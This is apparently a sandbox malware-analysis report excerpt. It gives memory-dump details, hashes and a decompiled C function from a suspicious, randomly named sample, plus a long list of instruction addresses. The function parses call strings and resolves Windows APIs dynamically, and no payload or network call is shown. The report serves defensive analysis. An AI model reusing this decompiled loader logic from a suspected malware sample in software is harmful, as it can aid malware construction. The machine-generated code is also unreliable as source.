                                                Strings
                                                Memory Dump Source
                                                • Source File: 00000000.00000002.752532009.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                • Associated: 00000000.00000002.752517951.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752570246.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752600293.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752691816.0000000000422000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752707144.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752721715.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752738892.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                • Associated: 00000000.00000002.752758445.0000000000450000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                Joe Sandbox IDA Plugin
                                                • Snapshot File: hcaresult_0_2_400000_xKBLVUHoY6.jbxd
                                                Similarity
                                                • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                • String ID: A$C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Lagerhals\Territorially$Call
                                                • API String ID: 2624150263-348057929
                                                • Opcode ID: 1c5a3ed0ee9c710774ec2d8b2a9b1df20d62e7de402cc8ac4ccff064f1b89d12
                                                • Instruction ID: 7ddb5d330cbe89f2e36b0747fff93e5a2dbc4858b94af439da1a7eccca155f6e
                                                • Opcode Fuzzy Hash: 1c5a3ed0ee9c710774ec2d8b2a9b1df20d62e7de402cc8ac4ccff064f1b89d12
                                                • Instruction Fuzzy Hash: 2EA18FB1900209ABDB119FA6CD45AAFB6B8EF84314F11803BF611B62D1D77C9A418B69
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                C-Code - Quality: 95%
                                                			E6EB81BFF() {
                                                				signed int _v8;
                                                				signed int _v12;
                                                				signed int _v16;
                                                				signed int _v20;
                                                				WCHAR* _v24;
                                                				WCHAR* _v28;
                                                				signed int _v32;
                                                				signed int _v36;
                                                				signed int _v40;
                                                				signed int _v44;
                                                				WCHAR* _v48;
                                                				signed int _v52;
                                                				void* _v56;
                                                				intOrPtr _v60;
                                                				WCHAR* _t208;
                                                				signed int _t211;
                                                				void* _t213;
                                                				void* _t215;
                                                				WCHAR* _t217;
                                                				void* _t225;
                                                				struct HINSTANCE__* _t226;
                                                				struct HINSTANCE__* _t227;
                                                				struct HINSTANCE__* _t229;
                                                				signed short _t231;
                                                				struct HINSTANCE__* _t234;
                                                				struct HINSTANCE__* _t236;
                                                				void* _t237;
                                                				intOrPtr* _t238;
                                                				void* _t249;
                                                				signed char _t250;
                                                				signed int _t251;
                                                				struct HINSTANCE__* _t257;
                                                				void* _t258;
                                                				signed int _t260;
                                                				signed int _t261;
                                                				signed short* _t264;
                                                				signed int _t269;
                                                				signed int _t272;
                                                				signed int _t274;
                                                				void* _t277;
                                                				void* _t281;
                                                				struct HINSTANCE__* _t283;
                                                				signed int _t286;
                                                				void _t287;
                                                				signed int _t288;
                                                				signed int _t300;
                                                				signed int _t301;
                                                				signed short _t304;
                                                				void* _t305;
                                                				signed int _t309;
                                                				signed int _t312;
                                                				signed int _t315;
                                                				signed int _t316;
                                                				signed int _t317;
                                                				signed short* _t321;
                                                				WCHAR* _t322;
                                                				WCHAR* _t324;
                                                				WCHAR* _t325;
                                                				struct HINSTANCE__* _t326;
                                                				void* _t328;
                                                				signed int _t331;
                                                				void* _t332;
                                                
                                                				_t283 = 0;
                                                				_v32 = 0;
                                                				_v36 = 0;
                                                				_v16 = 0;
                                                				_v8 = 0;
                                                				_v40 = 0;
                                                				_t332 = 0;
                                                				_v52 = 0;
                                                				_v44 = 0;
                                                				_t208 = E6EB812BB();
                                                				_v24 = _t208;
                                                				_v28 = _t208;
                                                				_v48 = E6EB812BB();
                                                				_t321 = E6EB812E3();
                                                				_v56 = _t321;
                                                				_v12 = _t321;
                                                				while(1) {
                                                					_t211 = _v32;
                                                					_v60 = _t211;
                                                					if(_t211 != _t283 && _t332 == _t283) {
                                                						break;
                                                					}
                                                					_t286 =  *_t321 & 0x0000ffff;
                                                					_t213 = _t286 - _t283;
                                                					if(_t213 == 0) {
                                                						_t37 =  &_v32;
                                                						 *_t37 = _v32 | 0xffffffff;
                                                						__eflags =  *_t37;
                                                						L20:
                                                						_t215 = _v60 - _t283;
                                                						if(_t215 == 0) {
                                                							__eflags = _t332 - _t283;
                                                							 *_v28 = _t283;
                                                							if(_t332 == _t283) {
                                                								_t332 = GlobalAlloc(0x40, 0x1ca4);
                                                								 *(_t332 + 0x1010) = _t283;
                                                								 *(_t332 + 0x1014) = _t283;
                                                							}
                                                							_t287 = _v36;
                                                							_t47 = _t332 + 8; // 0x8
                                                							_t217 = _t47;
                                                							_t48 = _t332 + 0x808; // 0x808
                                                							_t322 = _t48;
                                                							 *_t332 = _t287;
                                                							_t288 = _t287 - _t283;
                                                							__eflags = _t288;
                                                							 *_t217 = _t283;
                                                							 *_t322 = _t283;
                                                							 *(_t332 + 0x1008) = _t283;
                                                							 *(_t332 + 0x100c) = _t283;
                                                							 *(_t332 + 4) = _t283;
                                                							if(_t288 == 0) {
                                                								__eflags = _v28 - _v24;
                                                								if(_v28 == _v24) {
                                                									goto L42;
                                                								}
                                                								_t328 = 0;
                                                								GlobalFree(_t332);
                                                								_t332 = E6EB813B1(_v24);
                                                								__eflags = _t332 - _t283;
                                                								if(_t332 == _t283) {
                                                									goto L42;
                                                								} else {
                                                									goto L35;
                                                								}
                                                								while(1) {
                                                									L35:
                                                									_t249 =  *(_t332 + 0x1ca0);
                                                									__eflags = _t249 - _t283;
                                                									if(_t249 == _t283) {
                                                										break;
                                                									}
                                                									_t328 = _t332;
                                                									_t332 = _t249;
                                                									__eflags = _t332 - _t283;
                                                									if(_t332 != _t283) {
                                                										continue;
                                                									}
                                                									break;
                                                								}
                                                								__eflags = _t328 - _t283;
                                                								if(_t328 != _t283) {
                                                									 *(_t328 + 0x1ca0) = _t283;
                                                								}
                                                								_t250 =  *(_t332 + 0x1010);
                                                								__eflags = _t250 & 0x00000008;
                                                								if((_t250 & 0x00000008) == 0) {
                                                									_t251 = _t250 | 0x00000002;
                                                									__eflags = _t251;
                                                									 *(_t332 + 0x1010) = _t251;
                                                								} else {
                                                									_t332 = E6EB8162F(_t332);
                                                									 *(_t332 + 0x1010) =  *(_t332 + 0x1010) & 0xfffffff5;
                                                								}
                                                								goto L42;
                                                							} else {
                                                								_t300 = _t288 - 1;
                                                								__eflags = _t300;
                                                								if(_t300 == 0) {
                                                									L31:
                                                									lstrcpyW(_t217, _v48);
                                                									L32:
                                                									lstrcpyW(_t322, _v24);
                                                									goto L42;
                                                								}
                                                								_t301 = _t300 - 1;
                                                								__eflags = _t301;
                                                								if(_t301 == 0) {
                                                									goto L32;
                                                								}
                                                								__eflags = _t301 != 1;
                                                								if(_t301 != 1) {
                                                									goto L42;
                                                								}
                                                								goto L31;
                                                							}
                                                						} else {
                                                							if(_t215 == 1) {
                                                								_t257 = _v16;
                                                								if(_v40 == _t283) {
                                                									_t257 = _t257 - 1;
                                                								}
                                                								 *(_t332 + 0x1014) = _t257;
                                                							}
                                                							L42:
                                                							_v12 = _v12 + 2;
                                                							_v28 = _v24;
                                                							L59:
                                                							if(_v32 != 0xffffffff) {
                                                								_t321 = _v12;
                                                								continue;
                                                							}
                                                							break;
                                                						}
                                                					}
                                                					_t258 = _t213 - 0x23;
                                                					if(_t258 == 0) {
                                                						__eflags = _t321 - _v56;
                                                						if(_t321 <= _v56) {
                                                							L17:
                                                							__eflags = _v44 - _t283;
                                                							if(_v44 != _t283) {
                                                								L43:
                                                								_t260 = _v32 - _t283;
                                                								__eflags = _t260;
                                                								if(_t260 == 0) {
                                                									_t261 = _t286;
                                                									while(1) {
                                                										__eflags = _t261 - 0x22;
                                                										if(_t261 != 0x22) {
                                                											break;
                                                										}
                                                										_t321 =  &(_t321[1]);
                                                										__eflags = _v44 - _t283;
                                                										_v12 = _t321;
                                                										if(_v44 == _t283) {
                                                											_v44 = 1;
                                                											L162:
                                                											_v28 =  &(_v28[0]);
                                                											 *_v28 =  *_t321;
                                                											L58:
                                                											_t331 =  &(_t321[1]);
                                                											__eflags = _t331;
                                                											_v12 = _t331;
                                                											goto L59;
                                                										}
                                                										_t261 =  *_t321 & 0x0000ffff;
                                                										_v44 = _t283;
                                                									}
                                                									__eflags = _t261 - 0x2a;
                                                									if(_t261 == 0x2a) {
                                                										_v36 = 2;
                                                										L57:
                                                										_t321 = _v12;
                                                										_v28 = _v24;
                                                										_t283 = 0;
                                                										__eflags = 0;
                                                										goto L58;
                                                									}
                                                									__eflags = _t261 - 0x2d;
                                                									if(_t261 == 0x2d) {
                                                										L151:
                                                										_t304 =  *_t321;
                                                										__eflags = _t304 - 0x2d;
                                                										if(_t304 != 0x2d) {
                                                											L154:
                                                											_t264 =  &(_t321[1]);
                                                											__eflags =  *_t264 - 0x3a;
                                                											if( *_t264 != 0x3a) {
                                                												goto L162;
                                                											}
                                                											__eflags = _t304 - 0x2d;
                                                											if(_t304 == 0x2d) {
                                                												goto L162;
                                                											}
                                                											_v36 = 1;
                                                											L157:
                                                											_v12 = _t264;
                                                											__eflags = _v28 - _v24;
                                                											if(_v28 <= _v24) {
                                                												 *_v48 = _t283;
                                                											} else {
                                                												 *_v28 = _t283;
                                                												lstrcpyW(_v48, _v24);
                                                											}
                                                											goto L57;
                                                										}
                                                										_t264 =  &(_t321[1]);
                                                										__eflags =  *_t264 - 0x3e;
                                                										if( *_t264 != 0x3e) {
                                                											goto L154;
                                                										}
                                                										_v36 = 3;
                                                										goto L157;
                                                									}
                                                									__eflags = _t261 - 0x3a;
                                                									if(_t261 != 0x3a) {
                                                										goto L162;
                                                									}
                                                									goto L151;
                                                								}
                                                								_t269 = _t260 - 1;
                                                								__eflags = _t269;
                                                								if(_t269 == 0) {
                                                									L80:
                                                									_t305 = _t286 + 0xffffffde;
                                                									__eflags = _t305 - 0x55;
                                                									if(_t305 > 0x55) {
                                                										goto L57;
                                                									}
                                                									switch( *((intOrPtr*)(( *(_t305 + 0x6eb823e8) & 0x000000ff) * 4 +  &M6EB8235C))) {
                                                										case 0:
                                                											__ecx = _v24;
                                                											__edi = _v12;
                                                											while(1) {
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												L131:
                                                												__eflags =  *((intOrPtr*)(__edi + 2)) - __dx;
                                                												if( *((intOrPtr*)(__edi + 2)) != __dx) {
                                                													L136:
                                                													 *__ecx =  *__ecx & 0x00000000;
                                                													__eax = E6EB812CC(_v24);
                                                													__ebx = __eax;
                                                													goto L97;
                                                												}
                                                												L132:
                                                												__eflags = __ax;
                                                												if(__ax == 0) {
                                                													goto L136;
                                                												}
                                                												__eflags = __ax - __dx;
                                                												if(__ax == __dx) {
                                                													__edi = __edi + 1;
                                                													__edi = __edi + 1;
                                                													__eflags = __edi;
                                                												}
                                                												__ax =  *__edi;
                                                												 *__ecx =  *__edi;
                                                												__ecx = __ecx + 1;
                                                												__ecx = __ecx + 1;
                                                												__edi = __edi + 1;
                                                												__edi = __edi + 1;
                                                												_v12 = __edi;
                                                												__ax =  *__edi;
                                                												__eflags = __ax - __dx;
                                                												if(__ax != __dx) {
                                                													goto L132;
                                                												}
                                                												goto L131;
                                                											}
                                                										case 1:
                                                											_v8 = 1;
                                                											goto L57;
                                                										case 2:
                                                											_v8 = _v8 | 0xffffffff;
                                                											goto L57;
                                                										case 3:
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v16 = _v16 + 1;
                                                											goto L85;
                                                										case 4:
                                                											__eflags = _v20;
                                                											if(_v20 != 0) {
                                                												goto L57;
                                                											}
                                                											_v12 = _v12 - 2;
                                                											__ebx = E6EB812BB();
                                                											 &_v12 = E6EB81B86( &_v12);
                                                											__eax = E6EB81510(__edx, __eax, __edx, __ebx);
                                                											goto L97;
                                                										case 5:
                                                											L105:
                                                											_v20 = _v20 + 1;
                                                											goto L57;
                                                										case 6:
                                                											_push(7);
                                                											goto L123;
                                                										case 7:
                                                											_push(0x19);
                                                											goto L143;
                                                										case 8:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L107;
                                                										case 9:
                                                											_push(0x15);
                                                											goto L143;
                                                										case 0xa:
                                                											_push(0x16);
                                                											goto L143;
                                                										case 0xb:
                                                											_push(0x18);
                                                											goto L143;
                                                										case 0xc:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L118;
                                                										case 0xd:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L109;
                                                										case 0xe:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L111;
                                                										case 0xf:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L122;
                                                										case 0x10:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L113;
                                                										case 0x11:
                                                											_push(3);
                                                											goto L123;
                                                										case 0x12:
                                                											_push(0x17);
                                                											L143:
                                                											_pop(__ebx);
                                                											goto L98;
                                                										case 0x13:
                                                											__eax =  &_v12;
                                                											__eax = E6EB81B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											__eflags = __ebx - 0xb;
                                                											if(__ebx < 0xb) {
                                                												__ebx = __ebx + 0xa;
                                                											}
                                                											goto L97;
                                                										case 0x14:
                                                											__ebx = 0xffffffff;
                                                											goto L98;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L116;
                                                										case 0x16:
                                                											__ecx = 0;
                                                											__eflags = 0;
                                                											goto L91;
                                                										case 0x17:
                                                											__eax = 0;
                                                											__eax = 1;
                                                											__eflags = 1;
                                                											goto L120;
                                                										case 0x18:
                                                											_t271 =  *(_t332 + 0x1014);
                                                											__eflags = _t271 - _v16;
                                                											if(_t271 > _v16) {
                                                												_v16 = _t271;
                                                											}
                                                											_v8 = _v8 & 0x00000000;
                                                											_v20 = _v20 & 0x00000000;
                                                											_v36 - 3 = _t271 - (_v36 == 3);
                                                											if(_t271 != _v36 == 3) {
                                                												L85:
                                                												_v40 = 1;
                                                											}
                                                											goto L57;
                                                										case 0x19:
                                                											L107:
                                                											__ecx = 0;
                                                											_v8 = 2;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1a:
                                                											L118:
                                                											_push(5);
                                                											goto L123;
                                                										case 0x1b:
                                                											L109:
                                                											__ecx = 0;
                                                											_v8 = 3;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1c:
                                                											L111:
                                                											__ecx = 0;
                                                											__ecx = 1;
                                                											goto L91;
                                                										case 0x1d:
                                                											L122:
                                                											_push(6);
                                                											goto L123;
                                                										case 0x1e:
                                                											L113:
                                                											_push(2);
                                                											goto L123;
                                                										case 0x1f:
                                                											__eax =  &_v12;
                                                											__eax = E6EB81B86( &_v12);
                                                											__ebx = __eax;
                                                											__ebx = __eax + 1;
                                                											goto L97;
                                                										case 0x20:
                                                											L116:
                                                											_v52 = _v52 + 1;
                                                											_push(4);
                                                											_pop(__ecx);
                                                											goto L91;
                                                										case 0x21:
                                                											L120:
                                                											_push(4);
                                                											L123:
                                                											_pop(__ecx);
                                                											L91:
                                                											__edi = _v16;
                                                											__edx =  *(0x6eb8405c + __ecx * 4);
                                                											__eax =  ~__eax;
                                                											asm("sbb eax, eax");
                                                											_v40 = 1;
                                                											__edi = _v16 << 5;
                                                											__eax = __eax & 0x00008000;
                                                											__edi = (_v16 << 5) + __esi;
                                                											__eax = __eax | __ecx;
                                                											__eflags = _v8;
                                                											 *(__edi + 0x1018) = __eax;
                                                											if(_v8 < 0) {
                                                												L93:
                                                												__edx = 0;
                                                												__edx = 1;
                                                												__eflags = 1;
                                                												L94:
                                                												__eflags = _v8 - 1;
                                                												 *(__edi + 0x1028) = __edx;
                                                												if(_v8 == 1) {
                                                													__eax =  &_v12;
                                                													__eax = E6EB81B86( &_v12);
                                                													__eax = __eax + 1;
                                                													__eflags = __eax;
                                                													_v8 = __eax;
                                                												}
                                                												__eax = _v8;
                                                												 *((intOrPtr*)(__edi + 0x101c)) = _v8;
                                                												_t136 = _v16 + 0x81; // 0x81
                                                												_t136 = _t136 << 5;
                                                												__eax = 0;
                                                												__eflags = 0;
                                                												 *((intOrPtr*)((_t136 << 5) + __esi)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x1030)) = 0;
                                                												 *((intOrPtr*)(__edi + 0x102c)) = 0;
                                                												L97:
                                                												__eflags = __ebx;
                                                												if(__ebx == 0) {
                                                													goto L57;
                                                												}
                                                												L98:
                                                												__eflags = _v20;
                                                												_v40 = 1;
                                                												if(_v20 != 0) {
                                                													L103:
                                                													__eflags = _v20 - 1;
                                                													if(_v20 == 1) {
                                                														__eax = _v16;
                                                														__eax = _v16 << 5;
                                                														__eflags = __eax;
                                                														 *(__eax + __esi + 0x102c) = __ebx;
                                                													}
                                                													goto L105;
                                                												}
                                                												_v16 = _v16 << 5;
                                                												_t144 = __esi + 0x1030; // 0x1030
                                                												__edi = (_v16 << 5) + _t144;
                                                												__eax =  *__edi;
                                                												__eflags = __eax - 0xffffffff;
                                                												if(__eax <= 0xffffffff) {
                                                													L101:
                                                													__eax = GlobalFree(__eax);
                                                													L102:
                                                													 *__edi = __ebx;
                                                													goto L103;
                                                												}
                                                												__eflags = __eax - 0x19;
                                                												if(__eax <= 0x19) {
                                                													goto L102;
                                                												}
                                                												goto L101;
                                                											}
                                                											__eflags = __edx;
                                                											if(__edx > 0) {
                                                												goto L94;
                                                											}
                                                											goto L93;
                                                										case 0x22:
                                                											goto L57;
                                                									}
                                                								}
                                                								_t272 = _t269 - 1;
                                                								__eflags = _t272;
                                                								if(_t272 == 0) {
                                                									_v16 = _t283;
                                                									goto L80;
                                                								}
                                                								__eflags = _t272 != 1;
                                                								if(_t272 != 1) {
                                                									goto L162;
                                                								}
                                                								__eflags = _t286 - 0x6e;
                                                								if(__eflags > 0) {
                                                									_t309 = _t286 - 0x72;
                                                									__eflags = _t309;
                                                									if(_t309 == 0) {
                                                										_push(4);
                                                										L74:
                                                										_pop(_t274);
                                                										L75:
                                                										__eflags = _v8 - 1;
                                                										if(_v8 != 1) {
                                                											_t96 = _t332 + 0x1010;
                                                											 *_t96 =  *(_t332 + 0x1010) &  !_t274;
                                                											__eflags =  *_t96;
                                                										} else {
                                                											 *(_t332 + 0x1010) =  *(_t332 + 0x1010) | _t274;
                                                										}
                                                										_v8 = 1;
                                                										goto L57;
                                                									}
                                                									_t312 = _t309 - 1;
                                                									__eflags = _t312;
                                                									if(_t312 == 0) {
                                                										_push(0x10);
                                                										goto L74;
                                                									}
                                                									__eflags = _t312 != 0;
                                                									if(_t312 != 0) {
                                                										goto L57;
                                                									}
                                                									_push(0x40);
                                                									goto L74;
                                                								}
                                                								if(__eflags == 0) {
                                                									_push(8);
                                                									goto L74;
                                                								}
                                                								_t315 = _t286 - 0x21;
                                                								__eflags = _t315;
                                                								if(_t315 == 0) {
                                                									_v8 =  ~_v8;
                                                									goto L57;
                                                								}
                                                								_t316 = _t315 - 0x11;
                                                								__eflags = _t316;
                                                								if(_t316 == 0) {
                                                									_t274 = 0x100;
                                                									goto L75;
                                                								}
                                                								_t317 = _t316 - 0x31;
                                                								__eflags = _t317;
                                                								if(_t317 == 0) {
                                                									_t274 = 1;
                                                									goto L75;
                                                								}
                                                								__eflags = _t317 != 0;
                                                								if(_t317 != 0) {
                                                									goto L57;
                                                								}
                                                								_push(0x20);
                                                								goto L74;
                                                							} else {
                                                								_v32 = _t283;
                                                								_v36 = _t283;
                                                								goto L20;
                                                							}
                                                						}
                                                						__eflags =  *((short*)(_t321 - 2)) - 0x3a;
                                                						if( *((short*)(_t321 - 2)) != 0x3a) {
                                                							goto L17;
                                                						}
                                                						__eflags = _v32 - _t283;
                                                						if(_v32 == _t283) {
                                                							goto L43;
                                                						}
                                                						goto L17;
                                                					}
                                                					_t277 = _t258 - 5;
                                                					if(_t277 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							__eflags = _v36 - 3;
                                                							_v32 = 1;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							_v16 = (0 | _v36 == 0x00000003) + 1;
                                                							_v40 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					_t281 = _t277 - 1;
                                                					if(_t281 == 0) {
                                                						__eflags = _v44 - _t283;
                                                						if(_v44 != _t283) {
                                                							goto L43;
                                                						} else {
                                                							_v32 = 2;
                                                							_v8 = _t283;
                                                							_v20 = _t283;
                                                							goto L20;
                                                						}
                                                					}
                                                					if(_t281 != 0x16) {
                                                						goto L43;
                                                					} else {
                                                						_v32 = 3;
                                                						_v8 = 1;
                                                						goto L20;
                                                					}
                                                				}
                                                				GlobalFree(_v56);
                                                				GlobalFree(_v24);
                                                				GlobalFree(_v48);
                                                				if(_t332 == _t283 ||  *(_t332 + 0x100c) != _t283) {
                                                					L182:
                                                					return _t332;
                                                				} else {
                                                					_t225 =  *_t332 - 1;
                                                					if(_t225 == 0) {
                                                						_t187 = _t332 + 8; // 0x8
                                                						_t324 = _t187;
                                                						__eflags =  *_t324 - _t283;
                                                						if( *_t324 != _t283) {
                                                							_t226 = GetModuleHandleW(_t324);
                                                							__eflags = _t226 - _t283;
                                                							 *(_t332 + 0x1008) = _t226;
                                                							if(_t226 != _t283) {
                                                								L171:
                                                								_t192 = _t332 + 0x808; // 0x808
                                                								_t325 = _t192;
                                                								_t227 = E6EB816BD( *(_t332 + 0x1008), _t325);
                                                								__eflags = _t227 - _t283;
                                                								 *(_t332 + 0x100c) = _t227;
                                                								if(_t227 == _t283) {
                                                									__eflags =  *_t325 - 0x23;
                                                									if( *_t325 == 0x23) {
                                                										_t195 = _t332 + 0x80a; // 0x80a
                                                										_t231 = E6EB813B1(_t195);
                                                										__eflags = _t231 - _t283;
                                                										if(_t231 != _t283) {
                                                											__eflags = _t231 & 0xffff0000;
                                                											if((_t231 & 0xffff0000) == 0) {
                                                												 *(_t332 + 0x100c) = GetProcAddress( *(_t332 + 0x1008), _t231 & 0x0000ffff);
                                                											}
                                                										}
                                                									}
                                                								}
                                                								__eflags = _v52 - _t283;
                                                								if(_v52 != _t283) {
                                                									L178:
                                                									_t325[lstrlenW(_t325)] = 0x57;
                                                									_t229 = E6EB816BD( *(_t332 + 0x1008), _t325);
                                                									__eflags = _t229 - _t283;
                                                									if(_t229 != _t283) {
                                                										L166:
                                                										 *(_t332 + 0x100c) = _t229;
                                                										goto L182;
                                                									}
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									L180:
                                                									if(__eflags != 0) {
                                                										goto L182;
                                                									}
                                                									L181:
                                                									_t206 = _t332 + 4;
                                                									 *_t206 =  *(_t332 + 4) | 0xffffffff;
                                                									__eflags =  *_t206;
                                                									goto L182;
                                                								} else {
                                                									__eflags =  *(_t332 + 0x100c) - _t283;
                                                									if( *(_t332 + 0x100c) != _t283) {
                                                										goto L182;
                                                									}
                                                									goto L178;
                                                								}
                                                							}
                                                							_t234 = LoadLibraryW(_t324);
                                                							__eflags = _t234 - _t283;
                                                							 *(_t332 + 0x1008) = _t234;
                                                							if(_t234 == _t283) {
                                                								goto L181;
                                                							}
                                                							goto L171;
                                                						}
                                                						_t188 = _t332 + 0x808; // 0x808
                                                						_t236 = E6EB813B1(_t188);
                                                						 *(_t332 + 0x100c) = _t236;
                                                						__eflags = _t236 - _t283;
                                                						goto L180;
                                                					}
                                                					_t237 = _t225 - 1;
                                                					if(_t237 == 0) {
                                                						_t185 = _t332 + 0x808; // 0x808
                                                						_t238 = _t185;
                                                						__eflags =  *_t238 - _t283;
                                                						if( *_t238 == _t283) {
                                                							goto L182;
                                                						}
                                                						_t229 = E6EB813B1(_t238);
                                                						L165:
                                                						goto L166;
                                                					}
                                                					if(_t237 != 1) {
                                                						goto L182;
                                                					}
                                                					_t81 = _t332 + 8; // 0x8
                                                					_t284 = _t81;
                                                					_t326 = E6EB813B1(_t81);
                                                					 *(_t332 + 0x1008) = _t326;
                                                					if(_t326 == 0) {
                                                						goto L181;
                                                					}
                                                					 *(_t332 + 0x104c) =  *(_t332 + 0x104c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1050)) = E6EB812CC(_t284);
                                                					 *(_t332 + 0x103c) =  *(_t332 + 0x103c) & 0x00000000;
                                                					 *((intOrPtr*)(_t332 + 0x1048)) = 1;
                                                					 *((intOrPtr*)(_t332 + 0x1038)) = 1;
                                                					_t90 = _t332 + 0x808; // 0x808
                                                					_t229 =  *(_t326->i + E6EB813B1(_t90) * 4);
                                                					goto L165;
                                                				}
                                                			}

































































                                                0x6eb81c07
                                                0x6eb81c0a
                                                0x6eb81c0d
                                                0x6eb81c10
                                                0x6eb81c13
                                                0x6eb81c16
                                                0x6eb81c19
                                                0x6eb81c1b
                                                0x6eb81c1e
                                                0x6eb81c21
                                                0x6eb81c26
                                                0x6eb81c29
                                                0x6eb81c31
                                                0x6eb81c39
                                                0x6eb81c3b
                                                0x6eb81c3e
                                                0x6eb81c46
                                                0x6eb81c46
                                                0x6eb81c4b
                                                0x6eb81c4e
                                                0x00000000
                                                0x00000000
                                                0x6eb81c5b
                                                0x6eb81c60
                                                0x6eb81c62
                                                0x6eb81cf4
                                                0x6eb81cf4
                                                0x6eb81cf4
                                                0x6eb81cf8
                                                0x6eb81cfb
                                                0x6eb81cfd
                                                0x6eb81d1f
                                                0x6eb81d21
                                                0x6eb81d24
                                                0x6eb81d33
                                                0x6eb81d35
                                                0x6eb81d3b
                                                0x6eb81d3b
                                                0x6eb81d41
                                                0x6eb81d44
                                                0x6eb81d44
                                                0x6eb81d47
                                                0x6eb81d47
                                                0x6eb81d4d
                                                0x6eb81d4f
                                                0x6eb81d4f
                                                0x6eb81d51
                                                0x6eb81d54
                                                0x6eb81d57
                                                0x6eb81d5d
                                                0x6eb81d63
                                                0x6eb81d66
                                                0x6eb81d8a
                                                0x6eb81d8d
                                                0x00000000
                                                0x00000000
                                                0x6eb81d90
                                                0x6eb81d92
                                                0x6eb81da0
                                                0x6eb81da3
                                                0x6eb81da5
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81da7
                                                0x6eb81da7
                                                0x6eb81da7
                                                0x6eb81dad
                                                0x6eb81daf
                                                0x00000000
                                                0x00000000
                                                0x6eb81db1
                                                0x6eb81db3
                                                0x6eb81db5
                                                0x6eb81db7
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81db7
                                                0x6eb81db9
                                                0x6eb81dbb
                                                0x6eb81dbd
                                                0x6eb81dbd
                                                0x6eb81dc3
                                                0x6eb81dc9
                                                0x6eb81dcb
                                                0x6eb81ddf
                                                0x6eb81ddf
                                                0x6eb81de1
                                                0x6eb81dcd
                                                0x6eb81dd3
                                                0x6eb81dd6
                                                0x6eb81dd6
                                                0x00000000
                                                0x6eb81d68
                                                0x6eb81d68
                                                0x6eb81d68
                                                0x6eb81d69
                                                0x6eb81d71
                                                0x6eb81d75
                                                0x6eb81d7b
                                                0x6eb81d7f
                                                0x00000000
                                                0x6eb81d7f
                                                0x6eb81d6b
                                                0x6eb81d6b
                                                0x6eb81d6c
                                                0x00000000
                                                0x00000000
                                                0x6eb81d6e
                                                0x6eb81d6f
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x6eb81d6f
                                                0x6eb81cff
                                                0x6eb81d00
                                                0x6eb81d09
                                                0x6eb81d0c
                                                0x6eb81d19
                                                0x6eb81d19
                                                0x6eb81d0e
                                                0x6eb81d0e
                                                0x6eb81de7
                                                0x6eb81dea
                                                0x6eb81dee
                                                0x6eb81e61
                                                0x6eb81e65
                                                0x6eb81c43
                                                0x00000000
                                                0x6eb81c43
                                                0x00000000
                                                0x6eb81e65
                                                0x6eb81cfd
                                                0x6eb81c68
                                                0x6eb81c6b
                                                0x6eb81cce
                                                0x6eb81cd1
                                                0x6eb81ce3
                                                0x6eb81ce3
                                                0x6eb81ce6
                                                0x6eb81df3
                                                0x6eb81df6
                                                0x6eb81df6
                                                0x6eb81df8
                                                0x6eb821ae
                                                0x6eb821c6
                                                0x6eb821c6
                                                0x6eb821c9
                                                0x00000000
                                                0x00000000
                                                0x6eb821b3
                                                0x6eb821b4
                                                0x6eb821b7
                                                0x6eb821ba
                                                0x6eb82244
                                                0x6eb8224b
                                                0x6eb82251
                                                0x6eb82255
                                                0x6eb81e5c
                                                0x6eb81e5d
                                                0x6eb81e5d
                                                0x6eb81e5e
                                                0x00000000
                                                0x6eb81e5e
                                                0x6eb821c0
                                                0x6eb821c3
                                                0x6eb821c3
                                                0x6eb821cb
                                                0x6eb821ce
                                                0x6eb82238
                                                0x6eb81e51
                                                0x6eb81e54
                                                0x6eb81e57
                                                0x6eb81e5a
                                                0x6eb81e5a
                                                0x00000000
                                                0x6eb81e5a
                                                0x6eb821d0
                                                0x6eb821d3
                                                0x6eb821da
                                                0x6eb821da
                                                0x6eb821dd
                                                0x6eb821e1
                                                0x6eb821f5
                                                0x6eb821f5
                                                0x6eb821f8
